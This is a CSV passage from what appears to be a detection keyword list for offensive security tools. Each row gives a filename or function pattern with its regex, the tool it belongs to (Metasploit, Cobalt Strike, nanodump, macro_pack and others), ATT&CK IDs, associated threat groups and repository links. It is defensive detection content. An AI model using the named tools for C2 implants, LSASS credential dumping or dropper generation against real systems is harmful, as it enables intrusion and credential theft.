"*_mailinthemiddle.log*",".{0,1000}_mailinthemiddle\.log.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","N/A","8","2","108","9","2024-11-07T10:41:00Z","2024-02-21T07:25:37Z","20139"
"*_METERPRETER_BASE_INJECT_H*",".{0,1000}_METERPRETER_BASE_INJECT_H.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","20140"
"*_mouse_rce.rb*",".{0,1000}_mouse_rce\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20141"
"*_msfconsole*",".{0,1000}_msfconsole.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20142"
"*_msfvenom*",".{0,1000}_msfvenom.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","20143"
"*_nimplant_*",".{0,1000}_nimplant_.{0,1000}","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","Black Basta","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","N/A","10","10","871","111","2025-03-28T18:53:57Z","2023-02-13T13:42:39Z","20145"
"*_NT6_CLEAR_SECRET*",".{0,1000}_NT6_CLEAR_SECRET.{0,1000}","offensive_tool_keyword","NTHASH-FPC","various tools for retrieving windows secrets - Lateral Movement and C2","T1552.002 - T1552.005 - T1555.003 - T1555.005 - T1558 - T1558.003 - T1111 - T1552.001 - T1539 - T1606 - T1602","TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","N/A","Credential Access","https://github.com/erwan2212/NTHASH-FPC","1","0","N/A","N/A","10","1","35","9","2023-08-13T16:38:53Z","2019-08-09T11:49:55Z","20146"
"*_peloader.dll*",".{0,1000}_peloader\.dll.{0,1000}","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1548.002 - T1134.001 - T1087.002 - T1010 - T1547.001 - T1059.001 - T1059.003 - T1059.006 - T1543.003 - T1555.003 - T1555.004 - T1546.001 - T1546.003 - T1546.015 - T1041 - T1083 - T1564.003 - T1562.001 - T1562.003 - T1070 - T1070.004 - T1105 - T1056.001 - T1056.002 - T1556 - T1112 - T1106 - T1046 - T1135 - T1003.001 - T1069.001 - T1069.002 - T1057 - T1055 - T1012 - T1021.003 - T1021.006 - T1018 - T1113 - T1518.001 - T1558.003 - T1082 - T1033 - T1007 - T1124 - T1552.006 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","N/A","10","2239","416","2023-12-06T17:17:24Z","2018-09-25T15:17:30Z","20147"
"*_posh-common*",".{0,1000}_posh\-common.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","1","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","20148"
"*_ppl_dump.x64*",".{0,1000}_ppl_dump\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20149"
"*_ppl_dump.x64.*",".{0,1000}_ppl_dump\.x64\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20150"
"*_ppl_dump_dll.x64*",".{0,1000}_ppl_dump_dll\.x64.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20151"
"*_ppl_dump_dll.x86*",".{0,1000}_ppl_dump_dll\.x86.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20152"
"*_ppl_medic.x64.dll*",".{0,1000}_ppl_medic\.x64\.dll.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20153"
"*_ppl_medic.x64.exe*",".{0,1000}_ppl_medic\.x64\.exe.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20154"
"*_ppl_medic_dll.x64.*",".{0,1000}_ppl_medic_dll\.x64\..{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","Dispossessor","Credential Access","https://github.com/fortra/nanodump","1","0","N/A","N/A","10","10","1918","249","2024-09-17T22:58:11Z","2021-11-10T18:28:15Z","20155"
"*_prefix_PEzor_*",".{0,1000}_prefix_PEzor_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","Exploitation tool","https://github.com/phra/PEzor","1","1","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","20156"
"*_processDropper2Template(*",".{0,1000}_processDropper2Template\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20157"
"*_processDropperDllTemplate(*",".{0,1000}_processDropperDllTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20158"
"*_processDropperTemplate(*",".{0,1000}_processDropperTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20159"
"*_processEmbedDllTemplate(*",".{0,1000}_processEmbedDllTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20160"
"*_processEmbedExeTemplate(*",".{0,1000}_processEmbedExeTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20161"
"*_processMeterpreterTemplate(*",".{0,1000}_processMeterpreterTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta - FIN11 - FIN7 - Silence group - MuddyWater - FIN6 - GCMAN - Turla","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20162"
"*_processPowershellDropperTemplate(*",".{0,1000}_processPowershellDropperTemplate\(.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20163"
"*_pycobalt_*",".{0,1000}_pycobalt_.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dcsync/pycobalt","1","1","N/A","N/A","10","10","299","56","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z","20164"
"*_REFLECTIVEDLLINJECTION_*",".{0,1000}_REFLECTIVEDLLINJECTION_.{0,1000}","offensive_tool_keyword","Pezor","Open-Source Shellcode & PE Packer","T1027 - T1045 - T1055 - T1140 - T1204 - T1218","TA0005 - TA0043","N/A","N/A","Defense Evasion","https://github.com/phra/PEzor","1","0","N/A","N/A","10","10","1936","330","2024-02-03T19:11:05Z","2020-07-22T09:45:52Z","20165"
"*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Powerpick","allowing the execution of Powershell functionality without the use of Powershell.exe","T1059.001 - T1059.003 - T1086 - T1027.001","TA0005 - TA0002","N/A","Black Basta - Dispossessor","Defense Evasion","https://github.com/PowerShellEmpire/PowerTools","1","0","N/A","N/A","10","10","2106","815","2021-12-28T21:00:42Z","2014-03-06T14:49:51Z","20166"
"*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Recon-AD","AD recon tool based on ADSI and reflective DLL","T1087 - T1069 - T1082 - T1016 - T1033 - T1046 - T1135","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/outflanknl/Recon-AD","1","1","N/A","N/A","8","4","326","55","2019-10-20T21:49:39Z","2019-10-20T21:09:41Z","20167"
"*_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H*",".{0,1000}_REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","N/A","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","20168"
"*_SharpHound-v*.zip*",".{0,1000}_SharpHound\-v.{0,1000}\.zip.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","20170"
"*_Shellcode.bin*",".{0,1000}_Shellcode\.bin.{0,1000}","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and Lateral Movement.","T1548.002 - T1134 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0004 - TA0008 - TA0009 - TA0011 - TA0006 - TA0003 - TA0007 - TA0005 - TA0010","N/A","Black Basta - APT33 - HEXANE - Sandworm - Dispossessor","C2","https://github.com/nettitude/PoshC2","1","0","N/A","N/A","10","10","1908","340","2025-03-06T11:10:20Z","2018-07-23T08:53:32Z","20171"
"*_smtp_user-enum_hydra_*",".{0,1000}_smtp_user\-enum_hydra_.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20172"
"*_snmp_snmpwalk.txt*",".{0,1000}_snmp_snmpwalk\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20173"
"*_snmp_snmpwalk_process_paths.txt*",".{0,1000}_snmp_snmpwalk_process_paths\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20174"
"*_snmp_snmpwalk_running_processes.txt*",".{0,1000}_snmp_snmpwalk_running_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20175"
"*_snmp_snmpwalk_software_names.txt*",".{0,1000}_snmp_snmpwalk_software_names\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20176"
"*_snmp_snmpwalk_storage_units.txt*",".{0,1000}_snmp_snmpwalk_storage_units\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20177"
"*_snmp_snmpwalk_system_processes.txt*",".{0,1000}_snmp_snmpwalk_system_processes\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20178"
"*_snmp_snmpwalk_tcp_ports.txt*",".{0,1000}_snmp_snmpwalk_tcp_ports\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20179"
"*_snmp_snmpwalk_user_accounts.txt*",".{0,1000}_snmp_snmpwalk_user_accounts\.txt.{0,1000}","offensive_tool_keyword","AutoRecon","AutoRecon is a multi-threaded network reconnaissance tool which performs automated enumeration of services.","T1046 - T1018 - T1518 - T1210","TA0007 - TA0003","N/A","N/A","Reconnaissance","https://github.com/Tib3rius/AutoRecon","1","0","N/A","N/A","8","10","5421","912","2025-04-09T18:12:41Z","2019-03-01T23:50:14Z","20180"
"*_tcp_cc2(*",".{0,1000}_tcp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","20181"
"*_udp_cc2(*",".{0,1000}_udp_cc2\(.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","0","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","20182"
